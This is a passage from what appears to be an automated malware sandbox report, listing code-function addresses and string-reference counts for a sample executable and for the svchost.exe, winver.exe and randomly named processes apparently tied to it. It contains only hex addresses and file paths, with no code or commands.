                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00546DB60_2_00546DB6
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00526F9E0_2_00526F9E
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005230300_2_00523030
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0053F1D90_2_0053F1D9
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005331870_2_00533187
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005112870_2_00511287
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005314840_2_00531484
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005255200_2_00525520
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005376960_2_00537696
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005257600_2_00525760
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005319780_2_00531978
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00549AB50_2_00549AB5
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00597DDB0_2_00597DDB
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00531D900_2_00531D90
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0053BDA60_2_0053BDA6
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0051DF000_2_0051DF00
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00523FE00_2_00523FE0
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_010375B80_2_010375B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004188E38_2_004188E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004100EA8_2_004100EA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004100F38_2_004100F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004031508_2_00403150
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004011F08_2_004011F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00416AEE8_2_00416AEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00416AF38_2_00416AF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040E2F38_2_0040E2F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004103138_2_00410313
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040E4438_2_0040E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00401C608_2_00401C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00402C7B8_2_00402C7B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040E4388_2_0040E438
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00402C808_2_00402C80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040E48C8_2_0040E48C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004047548_2_00404754
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0042EFD38_2_0042EFD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A003E68_2_03A003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E3F08_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FA3528_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C02C08_2_039C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E02748_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A001AA8_2_03A001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F41A28_2_039F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F81CC8_2_039F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DA1188_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039301008_2_03930100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C81588_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D20008_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393C7C08_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039647508_2_03964750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039407708_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395C6E08_2_0395C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A005918_2_03A00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039405358_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EE4F68_2_039EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E44208_2_039E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F24468_2_039F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F6BD78_2_039F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FAB408_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393EA808_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A0A9A68_2_03A0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039429A08_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039569628_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039268B88_2_039268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E8F08_2_0396E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394A8408_2_0394A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039428408_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039BEFA08_2_039BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03932FC88_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394CFE08_2_0394CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03960F308_2_03960F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E2F308_2_039E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03982F288_2_03982F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B4F408_2_039B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03952E908_2_03952E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FCE938_2_039FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FEEDB8_2_039FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393AE0D8_2_0393AE0D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FEE268_2_039FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940E598_2_03940E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03958DBF8_2_03958DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DCD1F8_2_039DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394AD008_2_0394AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0CB58_2_039E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03930CF28_2_03930CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03940C008_2_03940C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0398739A8_2_0398739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F132D8_2_039F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392D34C8_2_0392D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039452A08_2_039452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395B2C08_2_0395B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E12ED8_2_039E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394B1B08_2_0394B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A0B16B8_2_03A0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392F1728_2_0392F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0397516C8_2_0397516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EF0CC8_2_039EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039470C08_2_039470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F70E98_2_039F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FF0E08_2_039FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FF7B08_2_039FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F16CC8_2_039F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039856308_2_03985630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DD5B08_2_039DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A095C38_2_03A095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F75718_2_039F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FF43F8_2_039FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039314608_2_03931460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395FB808_2_0395FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B5BF08_2_039B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0397DBF98_2_0397DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FFB768_2_039FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DDAAC8_2_039DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03985AA08_2_03985AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E1AA38_2_039E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EDAC68_2_039EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FFA498_2_039FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F7A468_2_039F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B3A6C8_2_039B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D59108_2_039D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039499508_2_03949950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395B9508_2_0395B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039438E08_2_039438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AD8008_2_039AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03941F928_2_03941F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FFFB18_2_039FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03903FD28_2_03903FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03903FD58_2_03903FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FFF098_2_039FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03949EB08_2_03949EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395FDC08_2_0395FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F1D5A8_2_039F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03943D408_2_03943D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F7D738_2_039F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FFCF28_2_039FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B9C328_2_039B9C32
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_051FED1711_2_051FED17
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_05200D3711_2_05200D37
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_0520751211_2_05207512
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_0520751711_2_05207517
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_051FEE5C11_2_051FEE5C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_051FEE6711_2_051FEE67
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_051FEEB011_2_051FEEB0
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_051F517811_2_051F5178
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_0521F9F711_2_0521F9F7
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_05200B0E11_2_05200B0E
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_05200B1711_2_05200B17
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_0520936911_2_05209369
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_086F586A11_2_086F586A
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_087200E911_2_087200E9
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_087099F911_2_087099F9
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_0870120011_2_08701200
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_0870120911_2_08701209
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_0870632911_2_08706329
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_0870142911_2_08701429
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_086FF40911_2_086FF409
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_08707C0411_2_08707C04
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_08707C0911_2_08707C09
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_086FF54E11_2_086FF54E
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_086FF55911_2_086FF559
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exeCode function: 11_2_086FF5A211_2_086FF5A2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045A244612_2_045A2446
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0459442012_2_04594420
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0459E4F612_2_0459E4F6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044F053512_2_044F0535
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045B059112_2_045B0591
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0450C6E012_2_0450C6E0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0451475012_2_04514750
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044F077012_2_044F0770
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044EC7C012_2_044EC7C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0458200012_2_04582000
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0457815812_2_04578158
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0458A11812_2_0458A118
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044E010012_2_044E0100
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045A81CC12_2_045A81CC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045B01AA12_2_045B01AA
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045A41A212_2_045A41A2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0459027412_2_04590274
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045702C012_2_045702C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045AA35212_2_045AA352
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045B03E612_2_045B03E6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044FE3F012_2_044FE3F0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044F0C0012_2_044F0C00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044E0CF212_2_044E0CF2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04590CB512_2_04590CB5
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0458CD1F12_2_0458CD1F
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044FAD0012_2_044FAD00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044EADE012_2_044EADE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04508DBF12_2_04508DBF
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044F0E5912_2_044F0E59
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045AEE2612_2_045AEE26
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045AEEDB12_2_045AEEDB
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04502E9012_2_04502E90
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045ACE9312_2_045ACE93
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04564F4012_2_04564F40
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04510F3012_2_04510F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04592F3012_2_04592F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04532F2812_2_04532F28
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044E2FC812_2_044E2FC8
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044FCFE012_2_044FCFE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0456EFA012_2_0456EFA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044F284012_2_044F2840
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044FA84012_2_044FA840
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0451E8F012_2_0451E8F0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044D68B812_2_044D68B8
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0450696212_2_04506962
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044F29A012_2_044F29A0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045BA9A612_2_045BA9A6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044EEA8012_2_044EEA80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045AAB4012_2_045AAB40
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045A6BD712_2_045A6BD7
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044E146012_2_044E1460
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045AF43F12_2_045AF43F
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045A757112_2_045A7571
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045B95C312_2_045B95C3
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0458D5B012_2_0458D5B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0453563012_2_04535630
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045A16CC12_2_045A16CC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045AF7B012_2_045AF7B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044F70C012_2_044F70C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0459F0CC12_2_0459F0CC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045A70E912_2_045A70E9
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045AF0E012_2_045AF0E0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045BB16B12_2_045BB16B
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0452516C12_2_0452516C
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044DF17212_2_044DF172
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044FB1B012_2_044FB1B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0450B2C012_2_0450B2C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045912ED12_2_045912ED
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044F52A012_2_044F52A0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044DD34C12_2_044DD34C
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045A132D12_2_045A132D
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0453739A12_2_0453739A
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04569C3212_2_04569C32
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045AFCF212_2_045AFCF2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045A1D5A12_2_045A1D5A
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044F3D4012_2_044F3D40
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045A7D7312_2_045A7D73
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0450FDC012_2_0450FDC0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044F9EB012_2_044F9EB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045AFF0912_2_045AFF09
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044F1F9212_2_044F1F92
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045AFFB112_2_045AFFB1
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0455D80012_2_0455D800
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044F38E012_2_044F38E0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0450B95012_2_0450B950
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_044F995012_2_044F9950
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0458591012_2_04585910
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045AFA4912_2_045AFA49
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045A7A4612_2_045A7A46
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04563A6C12_2_04563A6C
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0459DAC612_2_0459DAC6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04535AA012_2_04535AA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0458DAAC12_2_0458DAAC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04591AA312_2_04591AA3
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045AFB7612_2_045AFB76
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04565BF012_2_04565BF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0452DBF912_2_0452DBF9
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0450FB8012_2_0450FB80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_004A1E3012_2_004A1E30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0049CD0712_2_0049CD07
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0049CD1012_2_0049CD10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0049AF1012_2_0049AF10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0049CF3012_2_0049CF30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0049B05512_2_0049B055
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0049B06012_2_0049B060
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0049B0A912_2_0049B0A9
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0049137112_2_00491371
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_004A550012_2_004A5500
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_004A370B12_2_004A370B
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_004A371012_2_004A3710
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_004BBBF012_2_004BBBF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0429E69D12_2_0429E69D
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0429D76812_2_0429D768
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0429E1E412_2_0429E1E4
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0429E30312_2_0429E303
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_0429CA4312_2_0429CA43
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 0455EA12 appears 86 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 04525130 appears 58 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 0456F290 appears 105 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 044DB970 appears 277 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 04537E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 111 times
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: String function: 00530AE3 appears 70 times
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: String function: 00517DE1 appears 36 times
